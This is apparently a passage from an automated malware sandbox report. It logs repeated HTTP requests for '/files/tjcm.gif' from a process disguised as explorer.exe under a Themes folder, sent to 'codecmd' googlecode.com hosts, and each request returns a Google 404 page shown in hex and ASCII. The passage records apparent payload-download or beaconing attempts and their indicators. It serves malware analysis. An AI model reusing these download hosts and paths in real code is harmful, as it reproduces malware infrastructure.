25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:08:24.268443108 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.651156142.250.110.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:08:25.547204971 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:08:26.274126053 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:08:26 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:08:26.274159908 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.651158172.253.115.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:08:27.550349951 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:08:28.163800955 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:08:28 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:08:28.163979053 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.651160108.177.15.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:08:29.461282969 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:08:30.175519943 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:08:30 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:08:30.175571918 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              14192.168.2.651162142.250.110.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:08:31.478295088 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:08:32.169691086 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:08:32 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:08:32.170299053 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              15192.168.2.651163172.253.115.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:08:34.107275963 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:08:34.670366049 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:08:34 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:08:34.670389891 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              16192.168.2.651164108.177.15.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:08:35.917330027 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:08:36.711119890 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:08:36 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:08:36.711132050 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                              Sep 30, 2024 16:08:36.711864948 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              17192.168.2.651165142.250.110.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:08:38.000540018 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:08:38.727710962 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:08:38 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
